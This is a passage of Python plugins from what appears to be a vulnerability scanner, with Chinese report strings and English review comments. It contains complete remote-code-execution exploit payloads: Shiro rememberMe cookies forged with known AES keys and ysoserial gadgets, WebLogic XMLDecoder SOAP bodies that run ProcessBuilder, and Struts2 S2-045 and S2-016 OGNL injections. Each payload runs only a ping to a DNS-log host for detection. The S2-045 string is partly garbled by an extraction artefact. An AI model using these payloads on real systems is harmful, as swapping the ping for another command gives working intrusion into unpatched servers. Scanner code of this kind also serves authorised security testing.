        "Is9zJ3pzNh2cgTHB4ua3+Q==", "NsZXjXVklWPZwOfkvk6kUA==", "GAevYnznvgNCURavBhCr1w==", "66v1O8keKNV3TTcGPK1wzg==",
        "SDKOLKn2J1j/2BHjeZwAoQ==",
    ]
    BLOCK_SIZE = AES.block_size
    # PKCS#7 padding: append 1..BLOCK_SIZE bytes, each equal to the pad length.
    PAD_FUNC = lambda s: s + ((BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr( BLOCK_SIZE - len(s) % BLOCK_SIZE)).encode()
    AES_MODE = AES.MODE_CBC
    AES_IV = uuid.uuid4().bytes  # 16 random bytes, reused for every key in this call
    YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
    for key in CipherKey:
        try:
            DL = Dnslog()  # one DNS-log name per key so a callback identifies the key
            # NOTE(review): the child process is never waited on or closed;
            # only its stdout is read. Zombie/handle leak per iteration.
            popen = subprocess.Popen( ["java", "-jar", YsoserialPath, ExpClass, DL.dns_host()], stdout=subprocess.PIPE)
            encryptor = AES.new(base64.b64decode(key), AES_MODE, AES_IV)
            file_body = PAD_FUNC(popen.stdout.read())
            base64_ciphertext = base64.b64encode(AES_IV + encryptor.encrypt(file_body))  # cookie layout: IV || ciphertext
            payload_url = scheme + "://" + url + ":" + str(port)  # origin only, no path
            cookies = {
                "jeesite.session.id": "3f8a61ec-27e2-425c-9724-f96ba0c1e512",  # fixed filler value, kept as found
                "rememberMe": base64_ciphertext.decode()
            }
            # No headers are sent, so RandomAgent is unused; no sleep before polling.
            requests.get(payload_url, cookies=cookies, proxies=proxies, timeout=6, verify=False)  # verify=False: TLS certificate not checked
            if DL.result():
                Medusa = "{}存在ShiroRememberMe反序列化命令执行漏洞(CVE-2016-4437)\r\n验证数据:\r\n漏洞位置:{}\r\n秘钥:{}\r\ncookie:{}\r\nDNSLOG请求值:{}\r\nDNSLOG数据:{}\r\n".format( url, payload_url, key, cookies, DL.dns_host(), DL.dns_text())
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url, **kwargs).Write() # record the url and the scan result
                WriteFile().result(str(url), str(Medusa)) # write to file: url is the per-target file name, Medusa is the result
                break  # first accepted key ends the scan of this target
        except Exception as e:
            # Reached for malformed keys as well as network errors; the loop continues.
            _ = VulnerabilityInfo('').info.get('algroup')  # None if the key is absent -> concatenation below raises
            ErrorHandling().Outlier(e, _)
            ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # log the error with the target URL and plugin name
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """WebLogic XMLDecoder check plugin (CVE-2017-10271, per the report string).

    Variant of the ``**kwargs`` plugin earlier in this listing that normalises
    the target with ``UrlProcessing`` and builds its own header dict (so the
    caller's headers are not mutated).  Posts a Linux and a Windows SOAP
    document, each running only ``ping <dnslog host>``, to
    ``/wls-wsat/CoordinatorPortType`` and reports a hit after either one if
    ``DL.result()`` is truthy.  One ``Dnslog`` instance is shared by both
    requests.

    Args:
        Url: target; ``UrlProcessing`` splits it into scheme, host and port
            (the path, if any, is not used — requests go to the origin).
        RandomAgent: value for the ``User-Agent`` header.
        proxies: proxy specification, normalised by ``Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.

    Returns:
        None. Errors are routed to ``ErrorHandling`` / ``ErrorLog``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op branch: an explicit port is kept as given
    DL = Dnslog()
    # The command in the <string> elements is limited to `ping <dnslog host>`,
    # so the only observable effect of this check is the DNS callback.
    linux_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>ping {}</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>'''.format(DL.dns_host())
    # NOTE(review): `C:\Windows\System32\cmd.exe` is inside a non-raw literal;
    # `\W` and `\S` are invalid escapes (kept verbatim, but Python warns).
    windows_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>C:\Windows\System32\cmd.exe</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>ping {}</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> '''.format(DL.dns_host())
    for data in [linux_data, windows_data]:
        try:
            payload = '/wls-wsat/CoordinatorPortType'
            payload_url = scheme + "://" + url + ":" + str(port) + payload
            headers = {
                'User-Agent': RandomAgent,
                "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "text/xml",
            }
            resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False)  # verify=False: TLS certificate not checked
            con = resp.text
            time.sleep(4)  # give the callback time to arrive before polling
            # No `break` on a hit: the second variant is still sent and, with the
            # shared DL, can produce a second report for the same target.
            if DL.result():
                Medusa = "{}存在WebLogicXMLDecoder反序列化漏洞(CVE-2017-10271)\r\n验证数据:\r\n漏洞位置:{}\r\n利用POC:{}\r\n返回数据包:{}\r\nDNSlog数据:{}\r\nDNSlog随机数:{}\r\n".format( url, payload_url, data, con, DL.dns_text(), DL.dns_host())
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url, **kwargs).Write() # record the url and the scan result
                WriteFile().result(str(url), str(Medusa)) # write to file: url is the per-target file name, Medusa is the result
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')  # None if the key is absent -> concatenation below raises
            ErrorHandling().Outlier(e, _)
            ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # log the error with the target URL and plugin name
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Struts2 S2-045 check plugin (per the report string built below).

    Sends one POST whose ``Content-Type`` header is a fixed OGNL expression
    with the DNS-log host concatenated into a ``ping`` command; waits 2 s and
    reports a hit if ``DL.result()`` is truthy.  The header dict itself is what
    the report records as the "EXP".

    Args:
        Url: target; ``UrlProcessing`` splits it into scheme, host, port and path.
        RandomAgent: value for the ``User-Agent`` header.
        proxies: proxy specification, normalised by ``Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.

    Returns:
        None. Errors are routed to ``ErrorHandling`` / ``ErrorLog``.

    NOTE(review): the ``#[email protected]@DEFAULT_MEMBER_ACCESS`` fragment inside
    the Content-Type literal looks like an extraction artefact (an e-mail
    obfuscator rewriting an ``@``-bearing token).  The literal is kept exactly
    as found; it is not reconstructed here.
    """
    proxies=Proxies().result(proxies)
    scheme, url, port,path = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op branch: an explicit port is kept as given
    DL=Dnslog()
    con=""  # response body; stays empty if the request below fails
    try:
        payload_url = scheme + "://" + url +":"+ str(port)+path
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            # Only DL.dns_host() is interpolated (plain string concatenation).
            "Content-Type":"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping "+DL.dns_host()+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        }
        # Original note: keeps a request timeout (the target may block on the
        # command) from aborting the check before DL.result() is consulted.
        # NOTE(review): the bare except also hides connection/proxy errors, so
        # `con` is "" with no record of why.
        try:
            resp = requests.post(payload_url,headers=headers, timeout=6,proxies=proxies, verify=False)  # verify=False: TLS certificate not checked
            con = resp.text
        except:
            pass
        time.sleep(2)  # give the callback time to arrive before polling
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-045)\r\n漏洞详情:\r\n版本号:S2-045\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,headers,con,DL.dns_text(),DL.dns_host())
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write() # record the url and the scan result
            WriteFile().result(str(url),str(Medusa))# write to file: url is the per-target file name, Medusa is the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # None if the key is absent -> concatenation below raises
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# write the error log
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 DL=Dnslog() con="" payload="""?redirect:%24%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27ping%27%2c%27{}%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500%5D%2C%23d.read%28%23e%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D""".format(DL.dns_host()) try: payload_url = url+payload try:#防止在linux系统上执行了POC,导致超时扫描不到漏洞 resp = requests.get(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False) con = resp.text except: pass time.sleep(2) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-016)\r\n漏洞详情:\r\n版本号:S2-016\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,payload_url,con,DL.dns_text(),DL.dns_host()) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类